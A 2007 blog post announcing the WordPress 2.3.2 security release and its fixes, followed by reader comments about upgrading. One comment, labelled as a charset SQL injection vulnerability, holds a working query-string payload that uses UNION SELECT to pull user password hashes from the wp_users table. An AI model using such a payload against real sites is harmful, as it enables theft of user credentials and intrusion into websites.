20% Off Blog World Expo Pass - Use Coupon Code JV1PCHOW
 




Get Reviewed by this Blog for only $500
DealDotComTTZ MediaPerformancing Ads
Pepperjam NetworkBidvertiser
Text Link AdsKonterra

WordPress has just released an urgent security update for the 2.3 series. If you’re blog is powered by WordPress 2.3, then you should upgrade to this latest version right away. The upgrade fixes a security bug that allows people to view your timestamped posts. You may have seen a few posts around Blogsphere showing how to see what Shoemoney is going to post tomorrow. Well, once Shoe upgrades his WordPress, you won’t be able to do that anymore.

WordPress 2.3.2 also suppresses some error messages that can give away information about your database table structure and limits and stops some information leaks in the XML-RPC and APP implementations. There’s also a bonus that allows you to define a custom DB error page. See the full list of changes here.

This is not a major release and as such it will not change your DB structure. Upgrading should be as easy as uploading and replacing the old WordPress files. That’s what I did anyway. You can see a list of full bug fixes here.

Download WordPress 2.3.2

Find out what I am doing right now by following me on Twitter! If you like this post then please consider subscribing to my full feed RSS. You can also subscribe by Email and have new posts sent directly to your inbox.

1 Star2 Stars3 Stars4 Stars5 Stars (10 votes, average: 3.8 out of 5)
Loading ... Loading ...

Here's A Few More Related Posts

  • Wordpress 2.6.1 Available for Download
  • I Am Loving Wordpress 2.5
  • Wordpress 2.1.1 Released
  • Wordpress 2.6 Available for Download
  • New Wordpress 2.0.6

    RSS feed

    38 Comments

    2007-12-29 16:16:52
    MyAvatars 0.2

    WordPress Never Stop !!

    Comment by SEO Optimization
    2007-12-29 20:18:38
    MyAvatars 0.2

    Well at least they do improve and serve us with more secure platform rather than just ignore the bugs.

     
     
    Comment by Shaun Carter
    2007-12-29 16:41:28
    MyAvatars 0.2

    I know that if you know the URL of a post you can view it before it goes live but I didn’t know there was another way.

    I better go update now.

    Comment by mahdi yusuf
    2007-12-29 19:51:39
    MyAvatars 0.2

    does anybody else know, how? it could be cool as a little test

     
     
    Comment by Mike Goad
    2007-12-29 16:45:22
    MyAvatars 0.2

    I noticed the time stamp issue and thought that it shouldn’t work that way, but then just dismissed it. I guess that for the A-list bloggers, it could be detrimental for others to see your post before it’s officially published.

     
    Comment by Gary R. Hess
    2007-12-29 16:53:20
    MyAvatars 0.2

    Thanks! I probably wouldn’t have updated until much later if it wasn’t for this post :grin:

     
    Comment by Nicholas James
    2007-12-29 16:56:44
    MyAvatars 0.2

    Thanks, i’ll be upgrading my blog shortly. :razz:

     
    2007-12-29 17:56:05
    MyAvatars 0.2

    Good catch and good explanation, John. Funny, I took more than an hour off to drink coffee and work down the list of un-reads in my feedreader this morning and I didn’t come across anyone else mentioning this until I got to you (saving the best ’til last ;-)).

    I highly recommend techie-buzz’s automatic update plug-in. makes these upgrades a snap and also let’s you do backup as part of the process very painlessly. It’s available at:
    http://techie-buzz.com/wordpress-plugins/wordpress-automatic-upgrade-plugin.html
    for those who hate manual piece by piece updating.

    Comment by Inspired Epiphany
    2007-12-29 18:46:44
    MyAvatars 0.2

    Thanks for the info John… and thanks for the link to the Wordpress plugin Dave, it’s gonna make updating all my blogs that much faster! :smile:

     
     
    Comment by Shirvo Jones
    2007-12-29 18:00:06
    MyAvatars 0.2

    Good work Mr Chow. I just read it here first! The automatic updater you turned me on to wrks a treat as well. Cheers! :razz:

     
    Comment by vhxn.com
    2007-12-29 18:27:26
    MyAvatars 0.2

    Yes I saw on my blog Dashboard about New Version Update i didnt update yet , I wanna do this soon :roll:

     
    Comment by Mike Huang
    2007-12-29 18:35:59
    MyAvatars 0.2

    Darn! If only I knew about this earlier, so I could have sneaked into posts ;)

    -Mike

     
    Comment by Blogging Beat
    2007-12-29 18:44:22
    MyAvatars 0.2

    Dam, I’ve like 6 blogs that will need updating. Thanks for the heads up.

    Comment by vangardx
    2007-12-29 19:23:31
    MyAvatars 0.2

    use the plugin..it will be easier and fun :D

     
     
    Comment by Richard Bizick
    2007-12-29 19:23:02
    MyAvatars 0.2

    no one can read my timestamped posts :smile:

     
    Comment by mahdi yusuf
    2007-12-29 19:49:52
    MyAvatars 0.2

    goooooo wordpress!

     
    Comment by Joy
    2007-12-29 20:20:25
    MyAvatars 0.2

    Thanks a lot for the heads up!

     
    Comment by David Chew
    2007-12-29 20:34:59
    MyAvatars 0.2

    For people who want to have a full secure on his work or personal detail, upgrading would be a good idea. Thanks for showing us John.

     
    Comment by Contest Beat
    2007-12-29 20:50:11
    MyAvatars 0.2

    Thanks for the heads up

     
    Comment by ImageGag
    2007-12-29 21:01:43
    MyAvatars 0.2

    Newbie question. I’ve never done this before. Will I lose all of the tweaks, such as custom header, installed widgets, and other stuff that I’ve done?

    If so, is there an easy way to get everything back? I just don’t want to end up back at the basic Kubrick design. Thanks a lot.

    Comment by seo audit
    2007-12-30 00:57:37
    MyAvatars 0.2

    No you will not lose those.Made a backup anyway before upgrading.

    Comment by ImageGag
    2007-12-30 12:01:05
    MyAvatars 0.2

    Will do. Thank you.

     
     
     
    Comment by Steve!
    2007-12-30 00:29:11
    MyAvatars 0.2

    I’m still updating. Heck, I never knew you could see what Shoe was posting, before he posted it.

     
    Comment by seo audit
    2007-12-30 00:56:38
    MyAvatars 0.2

    Thx for the tip.

     
    Comment by Etienne Teo
    2007-12-30 01:08:05
    MyAvatars 0.2

    Wordpress just continues to updates and give the best to it’s users.

     
    2007-12-30 01:28:06
    MyAvatars 0.2

    Wordpress theme viewer back! Finally!

    Yay! The Wordpress theme viewer site is finally back probably following the Wordpress upgrade to 2.2.3.
    This has been something I’ve been tense about for a while as I was looking for a new theme, but couldn’t find one. Once again, I’m…

     
    Comment by Simon
    2007-12-30 02:28:58
    MyAvatars 0.2

    Thanks for the heads up on this John.

     
    Trackback by Simon Lau
    2007-12-30 02:31:25
    MyAvatars 0.2

    Wordpress 2.3.2 Upgrade

    Wordpress has released an urgent security release that can expose draft posts.  If you’re using 2.3.1, you should immediately do an upgrade.  The process took me about 5 minutes, which most it was making a backup of the server, deleting the nec…

     
    2007-12-30 03:13:18
    MyAvatars 0.2

    Thank you for the info about the update. Security is the first. :)

     
    2007-12-30 14:39:35
    MyAvatars 0.2

    [...] Chow at John Chow dot com reminds bloggers that Wordpress 2.3.2 is available for download. I have to get on this right away. Remember: if John Chow tells you to do something on your blog . . [...]

     
    Comment by Nullamatix
    2007-12-30 17:37:00
    MyAvatars 0.2

    After the upgrade several of my plug-ins stopped working. Specifically, Brian’s Threaded Comments, and WP-Cache. Anyone else running into this? My comments look terrible now.

     
    Comment by Dean Saliba
    2007-12-30 19:49:58
    MyAvatars 0.2

    I know what I did find, my theme no longer displays correctly, I had to go back to 2.3.1 to get it to work properly again.

     
    Comment by krazl
    2007-12-30 21:05:15
    MyAvatars 0.2

    Here technical reason documentation.
    === WordPress Charset SQL Injection Vulnerability ===
    exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23

     
    2007-12-30 21:51:50
    MyAvatars 0.2

    I don’t know if I’m going to upgrade right away or not. Decisions, decisions.

     
    Comment by BlackHatDomainer
    2007-12-30 23:06:26
    MyAvatars 0.2

    Thanks for reporting it, John. My blog jumped from 50 to 200 subscribers today. ;)

     
    Comment by MoneyNing
    2007-12-31 09:36:18
    MyAvatars 0.2

    For many, they rather people read their timestamp posts since it gives them one more visitors :twisted:

     
    2008-01-04 14:09:35
    MyAvatars 0.2

    [...] actually heard about the update over at John’s site before I logged into my Admin, so I managed to read through the comments, when I came across a much [...]

     
    Comment by
    2008-01-06 01:54:27
    MyAvatars 0.2

    “If you’re blog is powered by WordPress”

    No, I am not a blog.

     

    Sorry, the comment form is closed at this time.